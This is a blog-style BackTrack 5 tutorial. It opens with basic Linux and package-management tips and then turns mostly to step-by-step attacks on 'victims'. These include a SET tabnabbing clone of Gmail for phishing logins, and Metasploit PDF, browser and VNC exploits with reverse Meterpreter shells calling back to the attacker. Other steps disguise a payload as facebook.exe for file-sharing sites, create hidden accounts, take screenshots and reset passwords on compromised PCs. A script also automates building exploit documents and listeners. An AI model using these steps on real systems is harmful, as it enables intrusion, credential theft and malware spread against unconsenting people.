How to Login in BackTrack
Once the installation of BackTrack is done, the default username and password required to log in are root / toor. Change that password as soon as you log in (see "How to Change the Root Password" below): every BackTrack install ships with the same credentials, so anyone who can reach the machine knows them.
How to Open the GUI Environment in BackTrack
After you are logged in, you can start the GUI environment by issuing the startx command.
How to check IP address
root@bt:~# ifconfig
How to Setup IP Address Manually
root@bt:~# ifconfig eth0 192.168.1.8 netmask 255.255.255.0
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf
The echo command overwrites /etc/resolv.conf, so any nameserver that was already there is replaced. None of these settings survive a reboot or a network restart; to make them permanent, put them in /etc/network/interfaces.
How to Change the Root Password
root@bt:~# passwd
Enter new UNIX password: {enter your new password here}
Retype new UNIX password: {enter your new password again}
passwd: password updated successfully
root@bt:~#
How to start services
root@bt:~# /etc/init.d/openvpn start
Starting Virtual private network daemon(s)…
root@bt:~# /etc/init.d/openvpn stop
How to check kernel version
Use uname -a as shown below; the output includes the kernel release, build date and architecture.
root@bt:~# uname -a
Common Apt Commands
apt-get install <package>    Downloads <package> and all of its dependencies, and installs or upgrades them.
apt-get remove [--purge] <package>    Removes <package> and any packages that depend on it. --purge specifies that the packages should be purged (their configuration files are removed as well).
apt-get update    Updates the package listings from the repositories. Should be run at least once a week, and always before apt-get upgrade, since upgrade only knows about the versions listed at the last update.
apt-get upgrade    Upgrades all currently installed packages with the updates available from the repositories. Should be run once a week.
apt-get dist-upgrade [-u]    Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.
apt-cache search <pattern>    Searches package names and descriptions for <pattern>.
apt-cache show <package>    Shows the full description of <package>.
apt-cache showpkg <package>    Shows a lot more detail about <package> and its relationships to other packages.
man apt    Will give you more info on these commands as well as many that are in less common usage.
Common dpkg commands
dpkg -i <package.deb>    Installs a package file, for example one that you downloaded manually.
dpkg -c <package.deb>    Lists the contents of the .deb file <package.deb>.
dpkg -I <package.deb>    Extracts package information from the .deb file <package.deb>.
dpkg -r <package>    Removes an installed package named <package>.
dpkg -P <package>    Purges an installed package named <package>. The difference between remove and purge is that remove only deletes data and executables, while purge also deletes all configuration files.
dpkg -L <package>    Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.
dpkg -s <package>    Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.
dpkg-reconfigure <package>    Reconfigures an installed package.
man dpkg    Will give you more info on these commands as well as many that are in less common usage.
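One difference between the two tool sets matters for security: apt-get checks every package against the signed repository index before installing it, while dpkg -i checks nothing, so a .deb you downloaded by hand is trusted exactly as much as the site it came from. The shell functions below are an added example, not part of the original post or of the dpkg tools. They compare a local .deb against a known SHA-256 (which can be read from apt-cache show, because that value comes from the signed index), and dump the maintainer scripts that dpkg -i would run as root. The package name, version and file name in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example: checks to run before "dpkg -i" on a manually downloaded .deb.
# apt-get verifies the signed repository index; dpkg -i verifies nothing.

# Compare a local .deb against a known SHA-256 (from the signed Packages
# index, a vendor page or a checksum file). Returns 0 only on a match,
# 1 on a mismatch, 2 if the file is missing.
verify_deb() {
  deb=$1
  expected=$2
  [ -f "$deb" ] || { echo "verify_deb: no such file: $deb" >&2; return 2; }
  actual=$(sha256sum "$deb" | awk '{print $1}')
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  echo "verify_deb: SHA-256 mismatch for $deb" >&2
  echo "  expected: $expected" >&2
  echo "  actual:   $actual" >&2
  return 1
}

# Pull the SHA-256 that apt already holds for a given package version out of
# "apt-cache show" (that value comes from the signed index), so a .deb fetched
# by hand can be compared with it. Prints nothing if the version is unknown.
expected_sha256_from_apt() {
  apt-cache show "$1" | awk -v want="$2" '
    $1 == "Version:" { cur = $2 }
    $1 == "SHA256:" && cur == want { print $2; exit }
  '
}

# Show the maintainer scripts that dpkg -i would run as root, so they can be
# read before the package is installed. dpkg-deb -e extracts only the control
# part of the archive into a temporary directory; nothing is installed.
show_maintainer_scripts() {
  deb=$1
  dir=$(mktemp -d) || return 1
  dpkg-deb -e "$deb" "$dir" || { rm -rf "$dir"; return 1; }
  for s in preinst postinst prerm postrm; do
    if [ -f "$dir/$s" ]; then
      echo "== $s =="
      cat "$dir/$s"
    fi
  done
  rm -rf "$dir"
}

# Typical use (package name, version and file name are assumptions):
#   sum=$(expected_sha256_from_apt nmap 5.21-1ubuntu1)
#   verify_deb ./nmap_5.21-1ubuntu1_i386.deb "$sum" \
#     && show_maintainer_scripts ./nmap_5.21-1ubuntu1_i386.deb \
#     && dpkg -i ./nmap_5.21-1ubuntu1_i386.deb
```

If the hash does not match, the right move is to fetch the package again from the repository with apt-get rather than to install the file anyway; a mismatch means either a corrupt download or a file that is not what the index says it is.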
How to Hack Gmail, Facebook with BT 5 (SET Tabnabbing)
First open your BackTrack terminal and type ifconfig to check your IP. Then open another terminal and type cd /pentest/exploits/set
Now open the Social Engineering Toolkit (SET) with ./set
Now choose option 2, "Website Attack Vectors".
In this menu select option 4, "Tabnabbing Attack Method".
Then choose option 2, "Site Cloner".
Enter the URL of the site you want to clone, in this case http://www.gmail.com, and hit enter. SET will clone the web site and serve it from your IP; press return to continue.
When the victim opens your link, the page shows a message that it is still loading, so the victim switches to another tab. As soon as the victim opens a new tab, the script in the fake page replaces the contents of the now idle tab with the cloned login page you created, so the victim comes back to what looks like a site asking them to log in again.
Metasploit Tutorial for Beginners (Part 1)
The Metasploit Project is
an open-source, computer security project which provides
information about security vulnerabilities and aids
in penetration testing and IDS signature development. Its
most well-known sub-project is the Metasploit Framework, a tool for
developing and executing exploit code against a remote target
machine.
Metasploit helps security and IT professionals identify
security issues, verify vulnerability mitigations, and manage expert-driven
security assessments.
Download Metasploit for Windows users
Download Metasploit for Linux users
Minimum System Requirements:
- 2 GHz+ processor
- 2 GB RAM available (4 GB recommended, increase accordingly with VM targets on the same device)
- 500MB+ available disk space
- 10/100 Mbps network interface card
Supported Operating Systems:
- Windows XP, 2003, Vista, 2008 Server, and Windows 7
- Red Hat Enterprise Linux 5.x, 6.x – x86 and x86_64
- Ubuntu Linux 8.04, 10.04 – x86 and x86_64
Required Browser Versions
- Mozilla Firefox 4.0+
- Microsoft Internet Explorer 9
- Google Chrome 10+
Basic Terms of Metasploit
Vulnerability: A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. A vulnerability can be as simple as a weak password or as complex as a buffer overflow or a SQL injection flaw.
Exploit: An exploit is the code that takes advantage of a specific vulnerability. It is usually a small, highly specialized program whose only purpose is to trigger that vulnerability and provide access to the system. The vulnerability is the hole; the exploit is what goes through it.
Payload: A payload is
the piece of software that lets you control a computer system after it’s been
exploited. The payload is typically attached to and delivered by the exploit.
Metasploit Basic Command Tutorial
msfconsole    Starts the Metasploit console.
help    Shows the basic commands of Metasploit.
show payloads    Lists all the payloads available in Metasploit.
show exploits    Lists all the exploits in Metasploit.
msf > use <exploit>    Selects an exploit (or payload) module to work with.
msf exploit(name) > set payload <payload name>    Sets the payload for the selected exploit.
msf exploit(name) > set rhost <victim ip>    Sets the victim IP address for the selected exploit.
msf exploit(name) > set lhost <attacker ip>    Sets the attacker IP address the payload connects back to.
msf exploit(name) > unset rhost    Removes the rhost value.
msf exploit(name) > unset lhost    Removes the lhost value.
msf exploit(name) > setg rhost <victim ip>    Sets the victim IP address globally, for every module.
msf exploit(name) > setg lhost <attacker ip>    Sets the attacker IP address globally, for every module.
msf exploit(name) > sessions -l -v    Lists the open sessions with details.
Option names are not case sensitive (set LHOST and set lhost are the same), but command names are: Sessions -l is not a command, sessions -l is.
Meterpreter Basic Commands
help    The 'help' command, as may be expected, displays the Meterpreter help menu.
ps    The 'ps' command displays a list of running processes on the target.
ls    As in Linux, the 'ls' command will list the files in the current remote directory.
ipconfig    The 'ipconfig' command displays the network interfaces and addresses on the remote machine.
getuid    Running 'getuid' will display the user that the Meterpreter server is running as on the host.
download    The 'download' command downloads a file from the remote machine. Note the use of double backslashes when giving the Windows path, e.g. download c:\\boot.ini
upload    As with the 'download' command, you need to use double backslashes in the Windows path with the 'upload' command.
shell    The 'shell' command will present you with a standard command shell on the target system.
How to Hack Remote PC using PDF
Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets
0 - Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement
Attacker: BackTrack 5
Victim PC: Windows XP
Open a BackTrack terminal and type msfconsole
Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02
msf exploit(adobe_flatedecode_predictor02) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flatedecode_predictor02) > show options
msf exploit(adobe_flatedecode_predictor02) > set lhost 192.168.1.3 (IP of local host)
msf exploit(adobe_flatedecode_predictor02) > set filename attack.pdf
msf exploit(adobe_flatedecode_predictor02) > exploit
After the malicious PDF is generated it is stored on your local computer at /root/.msf4/local/attack.pdf
Now we need to set up a listener to handle the reverse connection the victim's machine makes when the exploit executes. The payload, lhost and lport must match what the PDF was built with (the default lport is 4444):
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send attack.pdf to the victim. As soon as they download and open it in a vulnerable Reader, you get a Meterpreter shell on the victim's computer.
Hack Remote PC using Payload in BackTrack 5
Open your BackTrack terminal and type cd /pentest/exploits/set. Now open the Social Engineering Toolkit (SET) with ./set
Now choose option 1, "Social-Engineering Attacks"
Now choose option 4, "Create a Payload and Listener"
Now choose 2, "Windows Reverse_TCP Meterpreter"; there are several others to choose from, including your own program.
Now choose 2, "shikata_ga_nai", as the encoder
Now choose a port for the listener. I chose 443, since it only has to be reachable from the victim and outbound 443 is rarely blocked, and then chose Yes to start a listener.
A file named msf.exe has now been created in the SET directory: /pentest/exploits/set/msf.exe
Now rename the file to anything you want. In my case I am renaming it facebook.exe
Now upload your exe to a file sharing website like filesonic, rapidshare or megaupload. In my case I am using 4shared.com. Now send the link to the victim.
As soon as the victim downloads and executes facebook.exe, the listener receives a session and you have access to the victim's PC.
Use sessions -l to list the sessions, then connect to one with its session number: sessions -i ID
How to Extract Email Addresses of a Domain using Metasploit
First open your BackTrack terminal and type msfconsole. Then type search collector
Now type use auxiliary/gather/search_email_collector
Then type show options
Next set the domain whose email addresses you want to locate: set domain example.com (use the bare domain, not www.example.com, since the module looks for addresses ending in @domain)
Then type run. By default the search engines used are Google, Bing and Yahoo; the addresses found are printed to the console, and set outfile <path> writes them to a file as well.
How to Create a hidden user in a Remote PC
Step 1: First hack the victim PC using Metasploit (see the "How to Hack Remote PC" tutorials above)
Step 2: In Meterpreter, type shell to get a command prompt on the victim PC
Step 3: Type net user rajchandel /add (rajchandel is the new user name) to create a new account on the victim PC
Step 4: Type net user rajchandel /active:no to disable the account
Step 5: Type net user rajchandel hacking to set its password (hacking)
Now check whether the account is disabled by typing net user rajchandel; the "Account active" line should read No. Note that a disabled account is not actually hidden: it still appears in the output of net user, and the creation, the disable and the password change are each recorded in the Windows Security log.
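Added example, not from the original post: the three net user commands above leave a recognisable trail in the Windows Security log, where event 4720 is "a user account was created", 4725 is "a user account was disabled" and 4724 is "an attempt was made to reset an account's password". The shell filter below reads a CSV export of those events and reports every account that was created and then disabled, which is exactly the sequence the steps above produce. The CSV layout and the sample events (including the rajchandel account from the steps above) are constructed for this example.

```shell
#!/bin/sh
# Added example: find accounts that were created (4720) and then disabled
# (4725) in a CSV export of the Windows Security log.
# Column layout is an assumption: TimeCreated,EventID,TargetUserName,SubjectUserName

# Constructed sample export. rajchandel follows the tutorial's sequence;
# helpdesk2 was created but not disabled; oldaccount was disabled but its
# creation is outside the export.
sample_events() {
  cat <<'EOF'
TimeCreated,EventID,TargetUserName,SubjectUserName
2012-05-01T10:01:02,4624,raj,-
2012-05-01T10:03:10,4720,rajchandel,administrator
2012-05-01T10:03:25,4725,rajchandel,administrator
2012-05-01T10:04:00,4724,rajchandel,administrator
2012-05-01T11:00:00,4720,helpdesk2,administrator
2012-05-01T11:30:00,4725,oldaccount,administrator
EOF
}

# Reads the export on stdin and prints "user created_at disabled_at" for
# every account whose 4725 follows a 4720 for the same name. The header
# line is skipped; accounts with only one of the two events are ignored.
find_created_then_disabled() {
  awk -F, '
    NR == 1 { next }
    $2 == 4720 { created[$3] = $1 }
    $2 == 4725 && ($3 in created) { print $3, created[$3], $1 }
  '
}

# Typical use on a real export (file name is an assumption):
#   find_created_then_disabled < security.csv
# On the sample data the only hit is rajchandel:
#   sample_events | find_created_then_disabled
```

The same pairing can be extended to 4724 (password reset on the disabled account) or to 4722 (account enabled again later, when the attacker wants to use it), but created-then-disabled alone already separates this trick from routine account administration, where new accounts are normally left enabled.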
How to capture a Screenshot of a Remote PC with Metasploit
- First hack the victim PC using Metasploit (see the "How to Hack Remote PC" tutorials above)
- Run the ps command to view all active processes
- Find the process ID of explorer.exe. In my case the victim's explorer.exe process ID is 1436, so type migrate 1436. explorer.exe runs on the logged-in user's desktop, so a session inside it can see the screen.
- After successfully migrating into explorer.exe, type use espia to load the extension that captures the victim's screen
- Type screengrab to capture a screenshot of the victim's desktop. The image is saved on your own machine, and Meterpreter prints the path it was written to.
How to change the password of a Remote PC in the LAN
Step 1: First hack the victim PC using Metasploit (see the "How to Hack Remote PC" tutorials above)
Step 2: In Meterpreter, type shell to get a command prompt on the victim PC
Step 3: Type net user to display the list of user accounts on the victim PC
Step 4: Type net user administrator raj to set the password of the account administrator to raj. This only works when the shell runs with administrative rights (check with whoami or getuid first), and the real user will notice the moment their old password stops working.
How to Hack Remote PC using Foxit Reader
This module exploits a stack buffer overflow in Foxit PDF
Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening
a malformed PDF file that contains an overly long string in the Title field.
This results in overwriting a structured exception handler record. NOTE: This
exploit does not use JavaScript.
Exploit Targets
Foxit Reader v4.1.1 X
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a BackTrack terminal and type msfconsole
Now type use exploit/windows/fileformat/foxit_title_bof
msf exploit(foxit_title_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(foxit_title_bof) > set lhost 192.168.1.2 (IP of local host)
msf exploit(foxit_title_bof) > exploit
The PDF is written under the module's default file name: /root/.msf4/local/corelan_foxit.pdf
Now we need to set up a listener to handle the reverse connection the victim's machine makes when the exploit executes, with the same payload and lhost the PDF was built with:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send corelan_foxit.pdf to the victim. As soon as they download and open it in a vulnerable Foxit Reader, you get a Meterpreter shell on the victim's computer.
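The file-format exploits above (the Adobe Reader PDF, the SET payload and the Foxit PDF sections) all end the same way: build the document with one module, then start exploit/multi/handler with the same payload, lhost and lport. The shell script below, an added example that is not part of the original tutorial or of Metasploit, writes both steps as msfconsole resource scripts so the two cannot drift apart, and checks the LHOST value first (the tutorial's "this must be an address on the local machine"). The 192.168.1.3 address, module names and document names are taken from the tutorial; the resource script file names are assumptions.

```shell
#!/bin/sh
# Added example: generate matching msfconsole resource scripts for a
# file-format exploit and its multi/handler listener, validating LHOST.

# POSIX-sh IPv4 check: four dotted decimal octets, each 0-255.
valid_ipv4() {
  case "$1" in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  old_ifs=$IFS
  IFS=.
  set -- $1
  IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Is LHOST actually configured on this machine? A reverse_tcp payload calls
# back to LHOST, so a wrong value means the document opens and nothing
# happens. Uses ip(8) or ifconfig, whichever exists; warns if neither does.
lhost_is_local() {
  if command -v ip >/dev/null 2>&1; then
    ip -4 -o addr show | grep -q "inet $1/"
  elif command -v ifconfig >/dev/null 2>&1; then
    ifconfig | grep -q "inet addr:$1 "
  else
    echo "lhost_is_local: cannot check $1 (no ip or ifconfig)" >&2
    return 0
  fi
}

# Write the resource script that builds the malicious document.
# Usage: gen_fileformat_rc MODULE LHOST LPORT FILENAME OUTFILE
gen_fileformat_rc() {
  module=$1 lhost=$2 lport=$3 filename=$4 out=$5
  valid_ipv4 "$lhost" || { echo "gen_fileformat_rc: bad LHOST: $lhost" >&2; return 1; }
  cat > "$out" <<EOF
use $module
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set FILENAME $filename
exploit
exit
EOF
}

# Write the matching multi/handler script. ExitOnSession false keeps the
# listener up after the first session; -j -z backgrounds the handler.
# Usage: gen_handler_rc LHOST LPORT OUTFILE
gen_handler_rc() {
  lhost=$1 lport=$2 out=$3
  valid_ipv4 "$lhost" || { echo "gen_handler_rc: bad LHOST: $lhost" >&2; return 1; }
  cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Typical use (build.rc and handler.rc are assumed names):
#   lhost_is_local 192.168.1.3 || echo "warning: 192.168.1.3 is not on a local interface"
#   gen_fileformat_rc exploit/windows/fileformat/foxit_title_bof 192.168.1.3 4444 corelan_foxit.pdf build.rc
#   gen_handler_rc 192.168.1.3 4444 handler.rc
#   msfconsole -q -r build.rc      # writes /root/.msf4/local/corelan_foxit.pdf and exits
#   msfconsole -q -r handler.rc    # leaves the listener running in the background
```

Because both scripts are generated from the same LHOST and LPORT arguments, the common mistake in this tutorial series (a handler listening on a different port or address than the document calls back to) cannot happen; the lhost_is_local check catches the other one, a stale address from a previous network.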
Hack Remote XP using Heap Overflow Attack (MS12-004 MIDI)
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than what is available on the heap (0x400 bytes allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we set up and force the browser to confuse types from tagVARIANT objects, which leads to remote code execution in the context of the user. Note: at this time, for the IE 8 target, you may choose either the JRE ROP or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
Exploit Targets
Windows XP service pack 2
Windows XP service pack 3
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a BackTrack terminal and type msfconsole
Now type use exploit/windows/browser/ms12_004_midi
msf exploit(ms12_004_midi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms12_004_midi) > set lhost 192.168.1.4 (IP of local host)
msf exploit(ms12_004_midi) > set lport 4444 (port on the local PC the payload connects back to)
msf exploit(ms12_004_midi) > set srvhost 192.168.1.4 (this must be an address on the local machine)
msf exploit(ms12_004_midi) > set srvport 80 (the local port to serve the page on; default 8080)
msf exploit(ms12_004_midi) > set uripath salesreport (the URL path to use for this exploit)
msf exploit(ms12_004_midi) > exploit
The URL to give the victim is http://192.168.1.4:80/salesreport
Send the link to the victim via chat or email or any other social engineering technique. When the victim opens it in a vulnerable Internet Explorer, you get a session on their PC. Use sessions -l to list the sessions and sessions -i ID to interact with one.
Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack
This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.
Exploit Targets
0 - Windows XP SP3 (default)
1 - Windows XP SP2
2 - Windows 7
Requirement
Attacker: BackTrack 5
Victim PC: Windows 7
Open a BackTrack terminal and type msfconsole
Now type use exploit/windows/vnc/ultravnc_bof
msf exploit(ultravnc_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(ultravnc_bof) > set lhost 192.168.1.4 (IP of local host)
msf exploit(ultravnc_bof) > set srvhost 192.168.1.4 (this must be an address on the local machine)
msf exploit(ultravnc_bof) > set target 2 (Windows 7; the default target is Windows XP SP3)
msf exploit(ultravnc_bof) > exploit
This is a malicious-server exploit, not a file or a web page: nothing happens until the victim connects a vulnerable UltraVNC Viewer to your srvhost on the module's srvport (check it with show options), so the victim has to be persuaded to open a VNC connection to your machine. Once they do, use sessions -l and sessions -i ID as above.
Hack windows 7 PC using MS11_003 Internet Explorer Exploit
This module exploits a memory corruption vulnerability
within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a
recursive CSS import, a C++ object is deleted and later reused. This leads to
arbitrary code execution. This exploit utilizes a combination of heap spraying
and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does
not opt-in to ASLR. As such, this module should be reliable on all Windows
versions with .NET 2.0.50727 installed.
Exploit Targets
0 – Automatic (default)
1 – Internet Explorer 8
2 – Internet Explorer 7
3 – Internet Explorer 6
4 – Debug Target (Crash)
Requirement
Attacker: Backtrack 5
Victim PC: Windows 7
Open a BackTrack terminal and type msfconsole
Now type use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set srvhost 192.168.1.4 (this must be an address on the local machine)
msf exploit(ms11_003_ie_css_import) > set srvport 80 (the local port to serve the page on; default 8080)
msf exploit(ms11_003_ie_css_import) > set uripath newhackingvideos.avi (the URL path to use for this exploit)
msf exploit(ms11_003_ie_css_import) > set lhost 192.168.1.4 (IP of local host)
msf exploit(ms11_003_ie_css_import) > exploit
The URL to give the victim is http://192.168.1.4:80/newhackingvideos.avi
When the victim opens it in a vulnerable Internet Explorer, you get a session on their PC. Use sessions -l to list the sessions and sessions -i ID to interact with one.
How to Attack on Remote Windows PC using Winzip
WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61)
could allow a remote attacker to execute arbitrary code on the system. The
control contains several unsafe methods and is marked safe for scripting and
safe for initialization. A remote attacker could exploit this vulnerability to
execute arbitrary code on the victim system. WinZip 10.0 <= Build 6667 are
vulnerable.
Exploit Targets
Windows XP
Winzip 10.0
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a BackTrack terminal and type msfconsole
Now type use exploit/windows/browser/winzip_fileview
msf exploit(winzip_fileview) > set payload windows/meterpreter/reverse_tcp
msf exploit(winzip_fileview) > set lhost 192.168.1.3 (IP of local host)
msf exploit(winzip_fileview) > set uripath zip (the URL path to use for this exploit)
msf exploit(winzip_fileview) > exploit
Send the link of the server (shown when the module starts, http://192.168.1.3:8080/zip with the default srvport) to the victim via chat or email or any other social engineering technique.
When the victim opens it in Internet Explorer with the vulnerable WinZip ActiveX control installed, you get a session on their PC. Use sessions -l to list the sessions and sessions -i ID to interact with one.
How to Attack a Remote PC using the HTTP Code Injection Technique
First install the Subterfuge toolkit in BackTrack (Subterfuge has its own installation tutorial)
Open your BackTrack terminal and type subterfuge
Now start a web browser and navigate to http://127.0.0.1:80/
After a few seconds you will see the main Subterfuge GUI.
Click on HTTP Code Injection
Click on Custom Inject and click Apply
In msfconsole, configure the browser_autopwn module that the injected code points victims at:
msf auxiliary(browser_autopwn) > set lhost 192.168.1.3 (IP address of your PC)
msf auxiliary(browser_autopwn) > exploit
Send the link of the server to the victim via chat or email or any other social engineering technique.
Now you have access to the victim's PC. Use sessions -l to list the sessions and sessions -i ID to interact with one.
Recommended links by ehacker007
http://backtrack-guide.blogspot.in/
http://beauty-of-linux.blogspot.com/
http://javascriptediting.blogspot.com/
Comments
where are you
could you complete what you began
thanks buddy, it's very useful information, thanks
All networking courses and practice tests are available at www.vullam.com